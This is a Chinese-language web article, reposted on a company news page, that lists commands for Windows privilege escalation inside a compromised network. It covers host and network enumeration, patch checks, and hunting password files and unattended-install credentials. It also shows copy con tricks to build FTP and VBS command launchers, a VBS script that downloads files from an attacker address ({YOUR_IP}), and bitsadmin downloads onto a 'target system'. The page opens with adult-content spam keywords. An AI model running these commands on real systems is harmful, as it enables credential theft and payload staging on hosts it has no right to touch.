真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

Windows內(nèi)網(wǎng)滲透提權(quán)的實用命令有哪些

Windows內(nèi)網(wǎng)滲透提權(quán)的實用命令有哪些,針對這個問題,這篇文章詳細(xì)介紹了相對應(yīng)的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

創(chuàng)新互聯(lián)是一家以網(wǎng)絡(luò)技術(shù)公司,為中小企業(yè)提供網(wǎng)站維護(hù)、成都網(wǎng)站制作、成都做網(wǎng)站、網(wǎng)站備案、服務(wù)器租用、主機(jī)域名、軟件開發(fā)、成都微信小程序等企業(yè)互聯(lián)網(wǎng)相關(guān)業(yè)務(wù),是一家有著豐富的互聯(lián)網(wǎng)運(yùn)營推廣經(jīng)驗的科技公司,有著多年的網(wǎng)站建站經(jīng)驗,致力于幫助中小企業(yè)在互聯(lián)網(wǎng)讓打出自已的品牌和口碑,讓企業(yè)在互聯(lián)網(wǎng)上打開一個面向全國乃至全球的業(yè)務(wù)窗口:建站來電聯(lián)系:18982081108

Windows內(nèi)網(wǎng)滲透提權(quán)的實用命令有哪些

這不是一篇滲透測試指導(dǎo),而是簡單介紹了幾個Windows內(nèi)網(wǎng)提權(quán)的實用命令,以供我等菜鳥學(xué)習(xí)觀摩,還望大牛包涵指導(dǎo)。

1.獲取操作系統(tǒng)信息

識別操作系統(tǒng)名稱及版本:

C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  OS Name: Microsoft Windows 10 Pro OS Version: 10.0.14393 N/A Build 14393

當(dāng)然中文系統(tǒng)你得這樣:

systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"

識別系統(tǒng)體系結(jié)構(gòu):

C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE%  AMD64

查看所有環(huán)境變量:

C:\Users\thel3l> SET USERNAME=thel3l USERPROFILE=C:\Users\thel3l *snip*

查看某特定用戶信息:

C:\Users\thel3l>net user thel3l  User name thel3l *snip* The command completed successfully

2.獲取網(wǎng)絡(luò)信息

查看路由表信息:

C:\Users\thel3l> route print

查看ARP緩存信息:

C:\Users\thel3l> arp -A

查看防火墻規(guī)則:

C:\Users\thel3l> netstat -ano  C:\Users\thel3l> netsh firewall show config  C:\Users\thel3l> netsh firewall show state

3.應(yīng)用程序及服務(wù)信息

查看計劃任務(wù):

C:\Users\thel3l> schtasks /QUERY /fo LIST /v

中文系統(tǒng)的命令,先調(diào)整GBK編碼為437美國編碼:

chcp 437

然后

schtasks /QUERY /fo LIST /v

查看服務(wù)進(jìn)程ID:

C:\Users\thel3l> tasklist /SVC

查看安裝驅(qū)動:

C:\Users\thel3l> DRIVERQUERY

查看安裝程序和版本信息(漏洞利用線索):

C:\Users\thel3l> wmic product list brief

查看服務(wù)、進(jìn)程和啟動程序信息:

C:\Users\thel3l> wmic service list brief C:\Users\thel3l> wmic process list brief C:\Users\thel3l> wmic startup list brief

查看.msi程序的執(zhí)行權(quán)限:

C:\Users\thel3l> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated C:\Users\thel3l> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看是否設(shè)置有setuid和setgid:

C:\Users\thel3l>reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

查看安裝補(bǔ)丁和時間信息:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn

查看特定漏洞補(bǔ)丁信息:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

4.敏感數(shù)據(jù)和目錄

查找密碼文件或其它敏感文件:

C:\Users\thel3l> cd/ C:\Users\thel3l> dir /b/s password.txt  C:\Users\thel3l> dir /b/s config.*  C:\Users\thel3l> findstr /si password *.xml *.ini *.txt C:\Users\thel3l> findstr /si login *.xml *.ini *.txt

無人值守安裝文件:

這些文件通常包含base64模式的密碼信息。這類文件在一些大型企業(yè)網(wǎng)絡(luò)或GHO系統(tǒng)中可以發(fā)現(xiàn),文件通常的位置如下:

C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml  C:\Windows\Panther\Unattended.xml

5.文件系統(tǒng)

可以通過調(diào)用系統(tǒng)預(yù)安裝程序語言查看當(dāng)前可訪問目錄或文件權(quán)限,如python下:

import os; os.system("cmd /c {command here}")

使用copy con命令創(chuàng)建ftp執(zhí)行會話:

范例

C:\Users\thel3l> copy con ftp.bat #創(chuàng)建一個名為ftp.bat的批處理文件  ftp # 輸入執(zhí)行會話名稱,按回車到下一行,之后按CTRL+Z結(jié)束編輯,再按回車退出  C:\Users\thel3l> ftp.bat # 執(zhí)行創(chuàng)建的文件  ftp> # 執(zhí)行ftp命令  ftp> !{command} # e.g. - !dir or !ipconfig

使用copy con命令創(chuàng)建VBS腳本文件:

C:\Users\thel3l> copy con commandExec.vbs #創(chuàng)建VBS腳本文件  Call WScript.CreateObject("Wscript.Shell").Run("cmd /K {command}", 8, True) #VBS文件內(nèi)容  C:\Users\thel3l> commandExec.vbs #執(zhí)行腳本文件

檢查文件夾可寫狀態(tài):

C:\Users\thel3l> dir /a-r-d /s /b

6.一個有用的文件上傳腳本

' downloadfile.vbs   ' Set your settings  strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"  strHDLocation = "c:\\{FILE_NAME.EXT}"  ' Fetch the file  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")  objXMLHTTP.open "GET", strFileURL, false  objXMLHTTP.send()  If objXMLHTTP.Status = 200 Then  Set objADOStream = CreateObject("ADODB.Stream")  objADOStream.Open  objADOStream.Type = 1 'adTypeBinary  objADOStream.Write objXMLHTTP.ResponseBody  objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject")  If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation  Set objFSO = Nothing  objADOStream.SaveToFile strHDLocation  objADOStream.Close  Set objADOStream = Nothing  End if  Set objXMLHTTP = Nothing

該腳本是一個社區(qū)發(fā)布的,你可以以下這種方式運(yùn)行它:

C:\Users\thel3l>cscript.exe downloadfile.vbs

bitsadmin命令:

如果你的目標(biāo)系統(tǒng)是Windows 7及以上操作系統(tǒng),你可以使用bitsadmin命令,bitsadmin是一個命令行工具,可用于創(chuàng)建下載上傳進(jìn)程:

范例

C:\Users\thel3l> bitsadmin /transfer job_name /download /priority priority URL local\path\file   C:\Users\thel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}   C:\Users\username\Downloads\{FILE_NAME.EXT}

如:

bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

關(guān)于Windows內(nèi)網(wǎng)滲透提權(quán)的實用命令有哪些問題的解答就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識。


當(dāng)前名稱:Windows內(nèi)網(wǎng)滲透提權(quán)的實用命令有哪些
新聞來源:http://weahome.cn/article/jeggjj.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部